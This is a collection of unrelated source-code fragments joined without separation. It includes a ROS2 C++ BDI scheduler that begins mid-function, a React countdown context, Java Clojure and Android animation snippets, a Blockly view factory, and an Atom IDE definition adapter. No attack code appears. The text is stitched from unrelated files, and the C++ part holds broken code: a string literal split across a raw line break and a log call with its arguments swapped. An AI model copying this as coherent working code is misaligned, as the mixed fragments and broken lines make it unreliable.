    {
        bool triggered = tryTriggerPlanExecution(selectedPlan);
        if(this->get_parameter(PARAM_DEBUG).as_bool())
        {
            if(triggered) RCLCPP_INFO(this->get_logger(), "Triggering of new plan execution succeeded");
            else RCLCPP_INFO(this->get_logger(), "Triggering of new plan execution failed");
        }
    }
}

/*
    Launch execution of selectedPlan; if successful, current_plan_ gets the value of selectedPlan
    returns true if successful
*/
bool Scheduler::launchPlanExecution(const BDIManaged::ManagedPlan& selectedPlan)
{
    //trigger plan execution
    bool triggered = plan_exec_srv_client_->triggerPlanExecution(selectedPlan.toPlan());
    if(triggered)
        current_plan_ = selectedPlan;// selectedPlan can now be set as currently executing plan

    if(this->get_parameter(PARAM_DEBUG).as_bool())
    {
        if(triggered) RCLCPP_INFO(this->get_logger(), "Triggered new plan execution fulfilling desire \"" + current_plan_.getDesire().getName() + "\": success");
        else RCLCPP_INFO(this->get_logger(), "Triggered new plan execution fulfilling desire \"" + selectedPlan.getDesire().getName() + "\": failed");
    }

    return triggered;
}

/*
    Abort execution of current_plan_; if successful, current_plan_ becomes empty
    returns true if successful
*/
bool Scheduler::abortCurrentPlanExecution()
{
    bool aborted = plan_exec_srv_client_->abortPlanExecution(current_plan_.toPlan());
    if(aborted)
    {
        if(this->get_parameter(PARAM_DEBUG).as_bool())
            RCLCPP_INFO(this->get_logger(), "Aborted plan execution fulfilling desire \"%s\"", current_plan_.getDesire().getName().c_str());//c_str() is required by the printf-style %s

        current_plan_ = ManagedPlan{}; //notifying you're not executing any plan right now
    }
    return aborted;
}

/*
    If the selected plan fits the minimal requirements for a plan (i.e.
    non-empty body and a desire which is in the desire_set), try triggering its execution by srv request to PlanDirector
    (/{agent}/plan_execution) by exploiting the TriggerPlanClient
*/
bool Scheduler::tryTriggerPlanExecution(const ManagedPlan& selectedPlan)
{
    string reschedulePolicy = this->get_parameter(PARAM_RESCHEDULE_POLICY).as_string();
    bool noPlan = noPlanSelected();
    //rescheduling not admitted -> a plan is already executing and the policy does not admit switching even for higher priority plans
    if(reschedulePolicy == VAL_RESCHEDULE_POLICY_NO_IF_EXEC && !noPlan)
        return false;

    //rescheduling possible, but a plan is currently in exec (substitute just for a plan with higher priority)
    bool planinExec = reschedulePolicy != VAL_RESCHEDULE_POLICY_NO_IF_EXEC && !noPlan;
    if(planinExec)
    {
        //before triggering the new plan, abort the one currently in exec
        if(this->get_parameter(PARAM_DEBUG).as_bool())
            RCLCPP_INFO(this->get_logger(), "Ready to abort plan for desire \"" + current_plan_.getDesire().getName() + "\"" +
                " in order to trigger plan execution for desire \"" + selectedPlan.getDesire().getName() + "\"");

        //trigger plan abortion
        if(!abortCurrentPlanExecution())
            return false;//current plan abortion failed
    }

    //desire still in desire set
    bool desireInDesireSet = desire_set_.count(selectedPlan.getDesire())==1;

    //check that a proper plan has been selected (with actions and fulfilling a desire in the desire_set_)
    if(selectedPlan.getBody().size() <= 0 || !desireInDesireSet)
        return false;

    return launchPlanExecution(selectedPlan);
}

/*
    Received update on current plan execution
*/
void Scheduler::updatePlanExecution(const BDIPlanExecutionInfo::SharedPtr msg)
{
    auto planExecInfo = (*msg);
    ManagedDesire targetDesire = ManagedDesire{planExecInfo.target};

    if(!noPlanSelected() && planExecInfo.target.name == current_plan_.getDesire().getName())//current plan selected in execution update
    {
        current_plan_exec_info_ = planExecInfo;
        string targetDesireName = targetDesire.getName();
        if(planExecInfo.status != planExecInfo.RUNNING)//plan not running anymore
        {
            mtx_iter_dset_.lock();
            bool desireAchieved = isDesireSatisfied(targetDesire);
            if(desireAchieved)
                delDesire(targetDesire, true);//desire achieved -> delete all desires within the same group

            if(planExecInfo.status == planExecInfo.SUCCESSFUL)//plan exec completed successfully
            {
                if(this->get_parameter(PARAM_DEBUG).as_bool())
                {
                    string addNote = desireAchieved?
                        "desire \"" + targetDesireName + "\" achieved will be removed from desire set" :
                        "desire \"" + targetDesireName + "\" still not achieved!
It'll not removed from the desire set yet"; RCLCPP_INFO(this->get_logger(), "Plan successfully executed: " + addNote); } } else if(planExecInfo.status == planExecInfo.ABORT && !desireAchieved)// plan exec aborted and desire not achieved { int maxPlanExecAttempts = this->get_parameter(PARAM_MAX_TRIES_EXEC_PLAN).as_int(); aborted_plan_desire_map_[targetDesireName]++; RCLCPP_INFO(this->get_logger(), "Plan execution for fulfilling desire \"" + targetDesireName + "\" has been aborted for the %d time (max attempts: %d)", aborted_plan_desire_map_[targetDesireName], maxPlanExecAttempts); if(aborted_plan_desire_map_[targetDesireName] >= maxPlanExecAttempts) { if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Desire \"" + targetDesireName + "\" will be removed because it doesn't seem feasible to fulfill it: too many plan abortions!"); delDesire(targetDesire); }else if(!targetDesire.getContext().isSatisfied(belief_set_) && this->get_parameter(PARAM_AUTOSUBMIT_CONTEXT).as_bool()){ // check for context condition failed // (just if not already done... that's why you look into the invalid map) // plan exec could have failed cause of them: evaluate if they can be reached and submit the desire to yourself string fulfillContextDesireName = targetDesire.getName() + "_fulfill_context"; // extract a desire (if possible) for each clause in the context conditions vector<ManagedDesire> fulfillContextDesires = BDIFilter::conditionsToMGDesire(targetDesire.getContext(), fulfillContextDesireName, std::min(targetDesire.getPriority()+0.01f, 1.0f), targetDesire.getDeadline()); for(ManagedDesire fulfillContextD : fulfillContextDesires) { if(desire_set_.count(fulfillContextD) == 0 && desireAcceptanceCheck(fulfillContextD) == ACCEPTED) { if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Context conditions are not satisfied for desire \"" + targetDesire.getName() + "\" but could be satisfied: " + + " auto-submission desire \"" + fulfillContextD.getName() + "\""); fulfillContextD.setParent(targetDesire);//set md as its parent desire addDesire(fulfillContextD, targetDesire, "_context"); } } } // if not reached max exec attempt, for now mantain the desire // if not valid anymore, it'll be eventually removed in next reschedulings, // otherwise the plan will be commissioned again until reaching maxPlanExecAttempts } mtx_iter_dset_.unlock(); current_plan_ = ManagedPlan{};//no current plan in execution reschedule(); //next reschedule(); will select a new plan if computable for a desire in desire set } } } /* Given the current knowledge of the belief set, decide if a given desire is already fulfilled */ bool Scheduler::isDesireSatisfied(ManagedDesire& md) { return md.isFulfilled(belief_set_); } /* Use the updated belief set for deciding if some desires are pointless to pursue given the current beliefs which shows they're already fulfilled */ void Scheduler::checkForSatisfiedDesires() { mtx_iter_dset_.lock();//to sync between iteration in checkForSatisfiedDesires() && reschedule() vector<ManagedDesire> satisfiedDesires; for(ManagedDesire md : desire_set_) { if(isDesireSatisfied(md))//desire already achieved, remove it { if(!noPlanSelected() && current_plan_.getDesire() == md && current_plan_exec_info_.status == current_plan_exec_info_.RUNNING && current_plan_exec_info_.executing.size() > 0 && !executingLastAction()) { int lastActionIndex = current_plan_exec_info_.actions.size() -1; int executingActionIndex = -1; for(auto exec_action : current_plan_exec_info_.executing) 
executingActionIndex = std::max((int)exec_action.index, executingActionIndex); if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Current plan execution fulfilling desire \"" + md.getName() + "\" will be aborted since desire is already fulfilled and plan exec. is still far from being completed " + "(executing %d out of %d)", lastActionIndex, executingActionIndex); //abort current_plan_ plan execution since current target desire is already achieved and you're far from completing the plan (missing more than last action) abortCurrentPlanExecution(); } else { if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Desire \"" + md.getName() + "\" will be removed from the desire set since its "+ "target appears to be already fulfilled given the current belief set"); satisfiedDesires.push_back(md);//delete desire just if not executing one, otherwise will be deleted when aborted feedback comes and desire is satisfied } } } for(ManagedDesire md : satisfiedDesires)//delete all satisfied desires from desire set delDesire(md, true);//you're deleting satisfied desires -> delete all the ones in the same group mtx_iter_dset_.unlock();//to sync between iteration in checkForSatisfiedDesires() && reschedule() } /* wrt the current plan execution... return true iff currently executing last action return false if otherwise or not executing any plan */ bool Scheduler::executingLastAction() { // not exeuting any plan or last update not related to currently triggered plan if(noPlanSelected() || current_plan_exec_info_.target.name != current_plan_.getDesire().getName()) return false; bool executingLast = false; for(auto currentExecutingAction : current_plan_exec_info_.executing) if(currentExecutingAction.index == current_plan_exec_info_.actions.size() - 1)//currentlyExecutingLast action executingLast = true; return executingLast; } /* The belief set has been updated */ void Scheduler::updatedBeliefSet(const BeliefSet::SharedPtr msg) { set<ManagedBelief> newBeliefSet = BDIFilter::extractMGBeliefs(msg->value); bool bsetModified = false;//is belief set altered from last update? 
for(ManagedBelief mb : newBeliefSet) if(belief_set_.count(mb) == 0)//check if new belief set has new items { bsetModified = true; break; } if(!bsetModified) for(ManagedBelief mb : belief_set_) if(newBeliefSet.count(mb) == 0)//check if new belief set has lost a few items { bsetModified = true; break; } if(bsetModified)//if belief set appears different from last update { belief_set_ = newBeliefSet;//update current mirroring of the belief set checkForSatisfiedDesires();//check for satisfied desires reschedule();//do a rescheduling } } /* Someone has publish a new desire to be fulfilled in the respective topic */ void Scheduler::addDesireTopicCallBack(const Desire::SharedPtr msg) { bool added = addDesire(ManagedDesire{(*msg)}); if(added)//addition done { publishDesireSet(); checkForSatisfiedDesires();// check for desire to be already fulfilled if(desire_set_.size() > 0 && noPlanSelected())// still there to be satisfied && no plan selected, rescheduled immediately reschedule(); } } /* Someone has publish a desire to be removed from the one to be fulfilled (if present) in the respective topic */ void Scheduler::delDesireTopicCallBack(const Desire::SharedPtr msg) { bool deleted = delDesire(ManagedDesire{(*msg)}); if(deleted) { publishDesireSet(); if(ManagedDesire{(*msg)} == current_plan_.getDesire())//deleted desire of current executing plan) abortCurrentPlanExecution();//abort current plan execution } } /* Wrapper for calling addDesire with just desire to added (where not linked to any other desires) N.B see addDesire(const ManagedDesire mdAdd, const optional<ManagedDesire> necessaryForMd) for further explanations */ bool Scheduler::addDesire(const ManagedDesire mdAdd) { return addDesire(mdAdd, std::nullopt, ""); } /* Add desire @mdAdd to desire_set_ (if there is not yet) add counters for invalid desire and aborted plan in respective maps (both init to zero) @necessaryForMd is another ManagedDesire which can be present if @mdAdd is necessary for the fulfillment of it (e.g. @mdAdd is derived from preconditions or context) @necessaryForMd value (if exists) has to be already in the desire_set_ */ bool Scheduler::addDesire(ManagedDesire mdAdd, optional<ManagedDesire> necessaryForMD, const string& suffixDesireGroup) { auto acceptance = desireAcceptanceCheck(mdAdd); if(acceptance != ACCEPTED && acceptance != UNKNOWN_INSTANCES)//unknown predicates values / syntax_errors within target beliefs return false; bool added = false; mtx_add_del_.lock(); added = addDesireCS(mdAdd, necessaryForMD, suffixDesireGroup); mtx_add_del_.unlock(); return added; } /* Add desire Critical Section (to be executed AFTER having acquired mtx_add_del_.lock()) Add desire @mdAdd to desire_set_ (if there is not yet) add counters for invalid desire and aborted plan in respective maps (both init to zero) @necessaryForMd is another ManagedDesire which can be present if @mdAdd is necessary for the fulfillment of it (e.g. @mdAdd is derived from preconditions or context) @necessaryForMd value (if exists) has to be already in the desire_set_ */ bool Scheduler::addDesireCS(ManagedDesire mdAdd, optional<ManagedDesire> necessaryForMD, const string& suffixDesireGroup) { if(mtx_add_del_.try_lock()) { //if acquired, it means we were not in CS, release it and return false -> operation not valid mtx_add_del_.unlock(); return false; } bool added = false; if(computed_plan_desire_map_.count(mdAdd.getName())==0 && aborted_plan_desire_map_.count(mdAdd.getName())==0 && desire_set_.count(mdAdd)==0)//desire already there (or diff. 
desire but with same name identifier) { if(necessaryForMD.has_value() && desire_set_.count(necessaryForMD.value())==1) { // @mdAdd linked to another MGdesire for which it is necessary in order to grant its execution // put as @mdAdd's group mdAdd.name + suffix (suffix can be "_precondition"/"_context") mdAdd.setDesireGroup(necessaryForMD.value().getName() + suffixDesireGroup); } desire_set_.insert(mdAdd); computed_plan_desire_map_.insert(std::pair<string, int>(mdAdd.getName(), 0));//to count invalid goal computations and discard after x aborted_plan_desire_map_.insert(std::pair<string, int>(mdAdd.getName(), 0));//to count invalid goal computations and discard after x added = true; } return added; } /* Wrapper for delDesire with two args */ bool Scheduler::delDesire(const ManagedDesire mdDel) { return delDesire(mdDel, false);//do not delete desires within the same group of mdDel } /* Del desire from desire_set if present (Access through lock!) */ bool Scheduler::delDesire(const ManagedDesire mdDel, const bool& wipeSameGroup) { bool deleted = false; mtx_add_del_.lock(); deleted = delDesireCS(mdDel, wipeSameGroup); mtx_add_del_.unlock(); return deleted; } /* Del desire from desire_set CRITICAL SECTION (to be called after having acquired mtx_add_del_ lock) In Addition Deleting atomically all the desires within the same desire group if @wipeSameGroup equals to true */ bool Scheduler::delDesireCS(const ManagedDesire mdDel, const bool& wipeSameGroup) { if(mtx_add_del_.try_lock()) { //if acquired, it means we were not in CS, release it and return false -> operation not valid mtx_add_del_.unlock(); return false; } bool deleted = false; //erase values from desires map if(computed_plan_desire_map_.count(mdDel.getName()) > 0) computed_plan_desire_map_.erase(mdDel.getName()); if(aborted_plan_desire_map_.count(mdDel.getName()) > 0) aborted_plan_desire_map_.erase(mdDel.getName()); if(desire_set_.count(mdDel)!=0) { desire_set_.erase(desire_set_.find(mdDel)); computed_plan_desire_map_.erase(mdDel.getName()); deleted = true; //RCLCPP_INFO(this->get_logger(), "Desire \"" + mdDel.getName() + "\" removed!");//TODO remove when assured there is no bug in deletion }/*else RCLCPP_INFO(this->get_logger(), "Desire \"" + mdDel.getName() + "\" to be removed NOT found!");*/ if(wipeSameGroup && mdDel.hasParent()) // desire being part of a group where you need to satisfy just one delDesireInGroupCS(mdDel.getDesireGroup()); // delete others in the same group return deleted; } /* Del desire group from desire_set CRITICAL SECTION (to be called after having acquired mtx_add_del_ lock) Deleting atomically all the desires within the same desire group */ void Scheduler::delDesireInGroupCS(const string& desireGroup) { vector<ManagedDesire> toBeDiscarded; for(ManagedDesire md : desire_set_) if(md.getDesireGroup() == desireGroup) toBeDiscarded.push_back(md); for(ManagedDesire md : toBeDiscarded) delDesireCS(md, false);//you're already iterating over all the desires within the same group } int main(int argc, char ** argv) { rclcpp::init(argc, argv); auto node = std::make_shared<Scheduler>(); node->wait_psys2_boot(std::chrono::seconds(8));//Wait max 8 seconds for plansys2 to boot node->init(); rclcpp::spin(node); rclcpp::shutdown(); return 0; }
import React, { createContext, ReactNode, useEffect, useState } from 'react'; let countdownTimeout: NodeJS.Timeout; interface CountdownContextData{ seconds: number; minutes: number; isActive:boolean; hasFinished:boolean; handleCountdown:()=>void; resetCountdown:()=>void; } interface CountdownProviderProps{ children:ReactNode; } export const countdownContext = createContext({} as CountdownContextData); export default function CountdownProvider ({children}:CountdownProviderProps){ const [time,setTime] = useState(25*60); const[isActive,setIsActive] = useState(false); const[hasFinished, setHasFinished] = useState(false); const minutes = Math.floor(time/60); const seconds = Math.floor(time%60); function handleCountdown(){ setIsActive(!isActive); } function resetCountdown(){ clearTimeout(countdownTimeout); setTime(25*60);//reset to the full 25-minute cycle setIsActive(false); setHasFinished(false); } useEffect(() =>{ if(isActive && time > 0){ countdownTimeout = setTimeout(() =>{ setTime(time - 1); },1000); }else if(isActive && time === 0){ setHasFinished(true); } },[isActive,time]); return( <countdownContext.Provider value={{ seconds, minutes, isActive, hasFinished, handleCountdown, resetCountdown }} > {children} </countdownContext.Provider> ); }
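// Illustrative usage sketch (not part of the original file): a minimal consumer
// component reading the context above via useContext. The component name and the
// './CountdownProvider' import path are assumptions made for this example.
import React, { useContext } from 'react';
import { countdownContext } from './CountdownProvider';

export function CountdownDisplay() {
  const { minutes, seconds, isActive, hasFinished, handleCountdown, resetCountdown } = useContext(countdownContext);

  return (
    <div>
      {/* zero-pad so e.g. 9:5 renders as 09:05 */}
      <span>{String(minutes).padStart(2, '0')}:{String(seconds).padStart(2, '0')}</span>
      {hasFinished ? (
        <button disabled>Cycle finished</button>
      ) : (
        <button onClick={isActive ? resetCountdown : handleCountdown}>
          {isActive ? 'Abandon cycle' : 'Start a cycle'}
        </button>
      )}
    </div>
  );
}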
// not for light-weight things like returning the player name. private void lazilyLoadGamerStub() { if (theClojureGamer == null) { try { RT.loadResourceScript(getClojureGamerFile() + ".clj"); Var gamerVar = RT.var("gamer_namespace", getClojureGamerName()); theClojureGamer = (Gamer)gamerVar.invoke(); } catch(Exception e) { GamerLogger.logError("GamePlayer", "Caught exception in Clojure initialization:"); GamerLogger.logStackTrace("GamePlayer", e); } } }
/** * Add animated views to the superview so that it can animate them */ @Override public void addAnimatedViews() { AnimatedView frameAnimatedView = new AnimatedView(findViewById(R.id.picture_frame), 0, 0, AnimType.ALPHA, 2); frameAnimatedView.setStartDelay(0); frameAnimatedView.setEndDelay(Constants.ANIMATION_DURATION / 2); AnimatedView tropicalBackgroundAnimatedView = new AnimatedView(findViewById(R.id.tropical_background), 0, 0, AnimType.ALPHA, 2); tropicalBackgroundAnimatedView.setStartDelay(0); tropicalBackgroundAnimatedView.setEndDelay(Constants.ANIMATION_DURATION / 2); AnimatedView backButtonAnimatedView = new AnimatedView(findViewById(R.id.back_button), 0, 0, AnimType.ALPHA, 2); backButtonAnimatedView.setStartDelay(0); backButtonAnimatedView.setEndDelay(Constants.ANIMATION_DURATION / 2); AnimatedView listAnimatedView = new AnimatedView(findViewById(R.id.listView), 0, 0, AnimType.RESIZE_HEIGHT, 2); listAnimatedView.setStartDelay(Constants.ANIMATION_DURATION / 2); listAnimatedView.setEndDelay(0); AnimatedView dividerAnimatedView = new AnimatedView(findViewById(R.id.divider), 0, 0, AnimType.ALPHA, 2); dividerAnimatedView.setStartDelay(0); dividerAnimatedView.setEndDelay(Constants.ANIMATION_DURATION / 2); AnimatedView addFavoriteAnimatedView = new AnimatedView(findViewById(R.id.add_favorite), 0, 0, AnimType.ALPHA, 2); addFavoriteAnimatedView.setStartDelay(0); addFavoriteAnimatedView.setEndDelay(Constants.ANIMATION_DURATION / 2); animatedViews.add(frameAnimatedView); animatedViews.add(tropicalBackgroundAnimatedView); animatedViews.add(backButtonAnimatedView); animatedViews.add(listAnimatedView); animatedViews.add(dividerAnimatedView); animatedViews.add(addFavoriteAnimatedView); }
/** * Base factory class responsible for creating all the {@link BlockView}s, {@link InputView}s, and * {@link FieldView}s for a given block representation. Complete view trees are constructed via * calls to {@link #buildBlockGroupTree} or {@link #buildBlockViewTree}. * <p/> * Subclasses must override {@link #buildBlockView}, {@link #buildInputView}, and * {@link #buildFieldView}. They may also override {@link #buildBlockGroup()} to provide a customized * container view implementation. */ public abstract class BlockViewFactory<BlockView extends com.google.blockly.android.ui.BlockView, InputView extends com.google.blockly.android.ui.InputView> { /** * Context for creating or loading views. */ protected Context mContext; /** * Helper for doing conversions and style lookups. */ protected WorkspaceHelper mHelper; /** * Name manager for the list of variables in this instance of Blockly. */ protected NameManager mVariableNameManager; /** * The callback to use for views that can request changes to the list of variables. */ protected VariableRequestCallback mVariableCallback; private SpinnerAdapter mVariableAdapter; // TODO(#137): Move to ViewPool class. protected final Map<String,WeakReference<BlockView>> mBlockIdToView = Collections.synchronizedMap(new HashMap<String, WeakReference<BlockView>>()); protected BlockViewFactory(Context context, WorkspaceHelper helper) { mContext = context; mHelper = helper; helper.setBlockViewFactory(this); } /** * Sets the callback to use for variable view events, such as the user selected delete/rename. * * @param callback The callback to set on variable field views. */ public void setVariableRequestCallback(VariableRequestCallback callback) { mVariableCallback = callback; } public WorkspaceHelper getWorkspaceHelper() { return mHelper; } /** * Set the {@link NameManager} being used to track variables in the workspace. * * @param variableNameManager The name manager for the variables in the associated workspace. */ public void setVariableNameManager(NameManager variableNameManager) { mVariableNameManager = variableNameManager; } /** * Creates a {@link BlockGroup} for the given block and its children using the workspace's * default style. * * @param rootBlock The root block to generate a view for. * @param connectionManager The {@link ConnectionManager} to update when moving connections. * @param touchHandler The {@link BlockTouchHandler} to manage all touches. * * @return A view for the block. */ public final BlockGroup buildBlockGroupTree(Block rootBlock, ConnectionManager connectionManager, BlockTouchHandler touchHandler) { BlockGroup bg = buildBlockGroup(); buildBlockViewTree(rootBlock, bg, connectionManager, touchHandler); return bg; } /** * Called to construct the complete hierarchy of views representing a {@link Block} and its * subcomponents, added to {@code parentGroup}. * * @param block The root block to generate a view for. * @param parentGroup The {@link BlockGroup} the new block view will be added to. * @param connectionManager The {@link ConnectionManager} to update when moving connections. * @param touchHandler The {@link BlockTouchHandler} to manage all touches. * * @return A view for the block and all its descendants. */ public final BlockView buildBlockViewTree(Block block, BlockGroup parentGroup, ConnectionManager connectionManager, BlockTouchHandler touchHandler) { BlockView blockView = getView(block); if (blockView != null) { throw new IllegalStateException("BlockView already created."); } List<Input> inputs = block.getInputs(); final int inputCount = inputs.size(); List<InputView> inputViews = new ArrayList<>(inputCount); for (int i = 0; i < inputCount; i++) { Input input = inputs.get(i); List<Field> fields = input.getFields(); List<FieldView> fieldViews = new ArrayList<>(fields.size()); for (int j = 0; j < fields.size(); j++) { fieldViews.add(buildFieldView(fields.get(j))); } InputView inputView = buildInputView(input, fieldViews); if (input.getType() != Input.TYPE_DUMMY) { Block targetBlock = input.getConnection().getTargetBlock(); if (targetBlock != null) { // Blocks connected to inputs live in their own BlockGroups. BlockGroup subgroup = buildBlockGroupTree( targetBlock, connectionManager, touchHandler); inputView.setConnectedBlockGroup(subgroup); } } inputViews.add(inputView); } blockView = buildBlockView(block, inputViews, connectionManager, touchHandler); // TODO(#137): Move to ViewPool class. mBlockIdToView.put(block.getId(), new WeakReference<BlockView>(blockView)); parentGroup.addView((View) blockView); Block next = block.getNextBlock(); if (next != null) { // Next blocks live in the same BlockGroup. buildBlockViewTree(next, parentGroup, connectionManager, touchHandler); // Recursively calls buildBlockViewTree(..) for the rest of the sequence. } return blockView; } /** * This returns the view constructed to represent a {@link Block}. Each block is only allowed * one view instance among the views managed by this factory (including * {@link WorkspaceFragment}, {@link ToolboxFragment}, and {@link TrashFragment}). Views are * constructed in {@link #buildBlockViewTree}, either directly or via recursion. If the block * view has not been constructed, this method will return null. * <p/> * Calling {@link BlockView#unlinkModel()} (possibly via {@link BlockGroup#unlinkModel()}) will * disconnect this view from its model, and it will no longer be returned from this method. * * @param block The {@link Block} to get the view for. * @return The previously constructed and active view of {@code block}. Otherwise null. */ @Nullable public final BlockView getView(Block block) { WeakReference<BlockView> viewRef = mBlockIdToView.get(block.getId()); return viewRef == null ? null : viewRef.get(); } /** * @return A new, empty {@link BlockGroup} container view for a sequence of blocks. */ public BlockGroup buildBlockGroup() { return new BlockGroup(mContext, mHelper); } /** * Build and populate the {@link BlockView} for {@code block}, using the provided * {@link InputView}s. * <p/> * This method should not recurse the model to generate more than one view. * {@link #buildBlockViewTree} will traverse the model and call this method for each * {@link Block}. * * @param block The {@link Block} to build a view for. * @param inputViews The list of {@link com.google.blockly.android.ui.InputView}s in this block. * @param connectionManager The {@link ConnectionManager} for the {@link Workspace}. * @param touchHandler The {@link BlockTouchHandler} this view should start with. * @return The new {@link com.google.blockly.android.ui.BlockView}.
*/ protected abstract BlockView buildBlockView(Block block, List<InputView> inputViews, ConnectionManager connectionManager, BlockTouchHandler touchHandler); /** * Build and populate the {@link InputView} for {@code input}. * <p/> * This method should not recurse the model to generate more than one view. * {@link #buildBlockViewTree} will traverse the model and call this method for each * {@link Input}. * * @param input The {@link Input} to build a view for. * @param fieldViews The list of {@link FieldView}s in the constructed view. * @return The new {@link com.google.blockly.android.ui.InputView}. */ protected abstract InputView buildInputView(Input input, List<FieldView> fieldViews); /** * Build and populate the {@link FieldView} for {@code field}. * <p> * Note: Variables need some extra setup when they are created by a custom * ViewFactory. * <ul> * <li>If they use an adapter to display the list of variables it must be set.</li> * <li>If they have delete/rename/create options they must have a * {@link VariableRequestCallback} set on them. {@link #mVariableCallback} may be used for * this purpose.</li> * </ul> * * * @param field The {@link Field} to build a view for. * @return The new {@link FieldView}. */ protected FieldView buildFieldView(Field field) { @Field.FieldType int type = field.getType(); switch (type) { case Field.TYPE_ANGLE: { BasicFieldAngleView fieldAngleView = new BasicFieldAngleView(mContext); fieldAngleView.setField((FieldAngle) field); return fieldAngleView; } case Field.TYPE_CHECKBOX: { BasicFieldCheckboxView fieldCheckboxView = new BasicFieldCheckboxView(mContext); fieldCheckboxView.setField((FieldCheckbox) field); return fieldCheckboxView; } case Field.TYPE_COLOR: { BasicFieldColorView fieldColorView = new BasicFieldColorView(mContext); fieldColorView.setField((FieldColor) field); return fieldColorView; } case Field.TYPE_DATE: { BasicFieldDateView fieldDateView = new BasicFieldDateView(mContext); fieldDateView.setField((FieldDate) field); return fieldDateView; } case Field.TYPE_DROPDOWN: { BasicFieldDropdownView fieldDropdownView = new BasicFieldDropdownView(mContext); fieldDropdownView.setField((FieldDropdown) field); return fieldDropdownView; } case Field.TYPE_IMAGE: { BasicFieldImageView fieldImageView = new BasicFieldImageView(mContext); fieldImageView.setField((FieldImage) field); return fieldImageView; } case Field.TYPE_INPUT: { BasicFieldInputView fieldInputView = new BasicFieldInputView(mContext); fieldInputView.setField((FieldInput) field); return fieldInputView; } case Field.TYPE_LABEL: { BasicFieldLabelView fieldLabelView = new BasicFieldLabelView(mContext); fieldLabelView.setField((FieldLabel) field); return fieldLabelView; } case Field.TYPE_VARIABLE: { BasicFieldVariableView fieldVariableView = new BasicFieldVariableView(mContext); fieldVariableView.setAdapter(getVariableAdapter()); fieldVariableView.setField((FieldVariable) field); fieldVariableView.setVariableRequestCallback(mVariableCallback); return fieldVariableView; } case Field.TYPE_NUMBER: { BasicFieldNumberView fieldNumberView = new BasicFieldNumberView(mContext); fieldNumberView.setField((FieldNumber) field); return fieldNumberView; } case Field.TYPE_UNKNOWN: default: throw new IllegalArgumentException("Unknown Field type: " + type); } } protected SpinnerAdapter getVariableAdapter() { if (mVariableNameManager == null) { throw new IllegalStateException("NameManager must be set before variable field is " + "instantiated."); } if (mVariableAdapter == null) { mVariableAdapter = new 
BasicFieldVariableView.VariableViewAdapter(mContext, mVariableNameManager, android.R.layout.simple_spinner_item); } return mVariableAdapter; } /** * Removes the mapping to this view from its block. This should only be called from * {@link BlockView#unlinkModel()}, which is already handled in {@link AbstractBlockView}. * * @param blockView The BlockView to disassociate from its Block model. */ // TODO(#137): Move to ViewPool class. protected final void unregisterView(BlockView blockView) { Block block = blockView.getBlock(); mBlockIdToView.remove(block.getId()); } }
import { remapAndPrintError } from "../source-map-support"; try { require('./parse'); } catch (err) { remapAndPrintError(err); }
import * as atomIde from 'atom-ide'; import Convert from '../convert'; import Utils from '../utils'; import { LanguageClientConnection, Location, ServerCapabilities, } from '../languageclient'; import { Point, TextEditor, Range, } from 'atom'; // Public: Adapts the language server definition provider to the // Atom IDE UI Definitions package for 'Go To Definition' functionality. export default class DefinitionAdapter { // Public: Determine whether this adapter can be used to adapt a language server // based on the serverCapabilities matrix containing a definitionProvider. // // * `serverCapabilities` The {ServerCapabilities} of the language server to consider. // // Returns a {Boolean} indicating adapter can adapt the server based on the // given serverCapabilities. public static canAdapt(serverCapabilities: ServerCapabilities): boolean { return serverCapabilities.definitionProvider === true; } // Public: Get the definitions for a symbol at a given {Point} within a // {TextEditor} including optionally highlighting all other references // within the document if the language server also supports highlighting. // // * `connection` A {LanguageClientConnection} to the language server that will provide definitions and highlights. // * `serverCapabilities` The {ServerCapabilities} of the language server that will be used. // * `languageName` The name of the programming language. // * `editor` The Atom {TextEditor} containing the symbol and potential highlights. // * `point` The Atom {Point} containing the position of the text that represents the symbol // for which the definition and highlights should be provided. // // Returns a {Promise} that resolves to a {DefinitionQueryResult} containing the // definitions and query range, or {null} if no definitions were found. public async getDefinition( connection: LanguageClientConnection, serverCapabilities: ServerCapabilities, languageName: string, editor: TextEditor, point: Point, ): Promise<atomIde.DefinitionQueryResult | null> { const documentPositionParams = Convert.editorToTextDocumentPositionParams(editor, point); const definitionLocations = DefinitionAdapter.normalizeLocations( await connection.gotoDefinition(documentPositionParams), ); if (definitionLocations == null || definitionLocations.length === 0) { return null; } let queryRange; if (serverCapabilities.documentHighlightProvider) { const highlights = await connection.documentHighlight(documentPositionParams); if (highlights != null && highlights.length > 0) { queryRange = highlights.map((h) => Convert.lsRangeToAtomRange(h.range)); } } return { queryRange: queryRange || [Utils.getWordAtPosition(editor, point)], definitions: DefinitionAdapter.convertLocationsToDefinitions(definitionLocations, languageName), }; } // Public: Normalize the locations so a single {Location} becomes an {Array} of just // one. The language server protocol may return either, as the protocol evolved between v1 and v2. // // * `locationResult` either a single {Location} object or an {Array} of {Locations} // // Returns an {Array} of {Location}s or {null} if the locationResult was null. public static normalizeLocations(locationResult: Location | Location[]): Location[] | null { if (locationResult == null) { return null; } return (Array.isArray(locationResult) ? locationResult : [locationResult]).filter((d) => d.range.start != null); } // Public: Convert an {Array} of {Location} objects into an Array of {Definition}s. // // * `locations` An {Array} of {Location} objects to be converted. // * `languageName` The name of the language these objects are written in. // // Returns an {Array} of {Definition}s that represent the converted {Location}s. public static convertLocationsToDefinitions(locations: Location[], languageName: string): atomIde.Definition[] { return locations.map((d) => ({ path: Convert.uriToPath(d.uri), position: Convert.positionToPoint(d.range.start), range: Range.fromObject(Convert.lsRangeToAtomRange(d.range)), language: languageName, })); } }
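// Illustrative sketch (not part of the original file) showing how the static helpers
// above compose. The import path and the Location literal are assumptions for the example.
import DefinitionAdapter from './adapters/definition-adapter';

// LSP servers historically returned either a single Location (v1) or an array (v2);
// normalizeLocations collapses both cases into an array (or null).
const single = {
  uri: 'file:///project/src/main.ts',
  range: { start: { line: 3, character: 4 }, end: { line: 3, character: 12 } },
};

const normalized = DefinitionAdapter.normalizeLocations(single as any);
// convertLocationsToDefinitions then maps each Location to an Atom IDE Definition
// (filesystem path plus Atom-style position/range).
const definitions =
  normalized != null && normalized.length > 0
    ? DefinitionAdapter.convertLocationsToDefinitions(normalized, 'TypeScript')
    : [];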
